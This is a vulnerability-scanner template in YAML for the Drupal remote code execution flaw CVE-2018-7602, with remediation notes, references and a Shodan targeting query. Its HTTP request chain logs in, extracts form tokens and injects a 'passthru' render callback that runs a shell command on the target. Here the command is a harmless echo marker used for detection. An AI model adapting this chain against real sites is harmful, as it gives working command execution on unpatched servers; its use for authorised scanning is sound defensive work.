88 lines
3.2 KiB
YAML
88 lines
3.2 KiB
YAML
id: CVE-2018-7602
|
|
|
|
info:
|
|
name: Drupal - Remote Code Execution
|
|
author: princechaddha
|
|
severity: critical
|
|
description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.
|
|
remediation: |
|
|
Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal.
|
|
reference:
|
|
- https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7602
|
|
- https://www.drupal.org/sa-core-2018-004
|
|
- https://www.exploit-db.com/exploits/44557/
|
|
- http://www.securitytracker.com/id/1040754
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2018-7602
|
|
epss-score: 0.97488
|
|
epss-percentile: 0.99966
|
|
cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 4
|
|
vendor: drupal
|
|
product: drupal
|
|
shodan-query: http.component:"drupal"
|
|
tags: cve2018,drupal,authenticated,kev,vulhub,edb,cve
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /?q=user%2Flogin HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
form_id=user_login&name={{username}}&pass={{password}}&op=Log+in
|
|
- |
|
|
GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1
|
|
Host: {{Hostname}}
|
|
- |
|
|
POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account
|
|
- |
|
|
POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
form_build_id={{form_build_id}}
|
|
|
|
cookie-reuse: true
|
|
host-redirects: true
|
|
max-redirects: 2
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- 'CVE-2018-7602-POC'
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: userid
|
|
group: 1
|
|
regex:
|
|
- '<meta about="([/a-z0-9]+)" property="foaf'
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
name: form_token
|
|
group: 1
|
|
regex:
|
|
- '<input type="hidden" name="form_token" value="(.*)" />'
|
|
internal: true
|
|
part: body
|
|
|
|
- type: regex
|
|
name: form_build_id
|
|
group: 1
|
|
regex:
|
|
- '<input type="hidden" name="form_build_id" value="(.*)" />'
|
|
internal: true
|
|
part: body
|
|
|
|
# digest: 4a0a00473045022100cf8fb140f40c1033568fd7a5c89c7560ce9f196779c2b3cd9ea51c694ef139b2022011f74c25f0e3e0bf1b10a9c3287aa31ac998a25e8e30fb6f30aa9ddffd4407cd:922c64590222798bb761d5b6d8e72950
|